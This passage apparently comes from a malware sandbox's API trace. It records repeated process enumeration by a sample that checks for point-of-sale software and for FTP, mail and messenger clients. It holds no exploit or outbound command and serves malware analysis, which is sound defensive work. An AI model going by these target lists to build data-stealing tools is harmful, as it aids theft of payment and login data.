th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0240.302] Process32Next (in: hSnapshot=0x22c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0240.305] Process32Next (in: hSnapshot=0x22c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0240.308] Process32Next (in: hSnapshot=0x22c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0240.311] Process32Next (in: hSnapshot=0x22c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0240.313] Process32Next (in: hSnapshot=0x22c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0240.315] Process32Next (in: hSnapshot=0x22c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0240.317] Process32Next (in: hSnapshot=0x22c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0240.319] Process32Next (in: hSnapshot=0x22c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0240.321] Process32Next (in: hSnapshot=0x22c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0240.328] Process32Next (in: hSnapshot=0x22c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0240.330] Process32Next (in: hSnapshot=0x22c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x25c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0240.332] Process32Next (in: hSnapshot=0x22c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0240.333] Process32Next (in: hSnapshot=0x22c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0240.335] CloseHandle (hObject=0x22c8) returned 1 [0240.335] Sleep (dwMilliseconds=0x64) [0240.438] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x223c [0240.452] Process32First (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0240.455] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x76, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0240.457] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0240.459] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0240.462] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0240.464] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0240.466] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0240.469] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0240.471] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0240.474] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0240.476] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0240.479] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0240.481] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0240.484] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0240.486] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0240.490] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0240.493] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0240.495] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x49, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0240.497] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0240.500] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0240.502] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0240.505] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x31, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0240.507] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0240.510] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0240.516] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0240.518] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0240.521] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0240.523] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0240.526] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0240.528] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0240.531] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0240.534] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0240.537] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0240.539] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0240.541] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0240.544] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0240.547] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0240.550] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0240.552] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0240.557] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0240.559] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0240.562] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0240.564] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0240.567] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0240.570] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0240.573] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0240.577] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0240.580] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0240.582] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0240.585] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0240.587] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0240.590] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0240.593] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0240.598] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0240.601] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0240.603] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0240.613] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0240.616] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0240.619] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0240.622] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0240.625] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0240.628] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0240.632] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0240.635] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0240.638] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0240.648] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0240.651] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0240.655] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0240.658] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0240.661] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0240.663] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 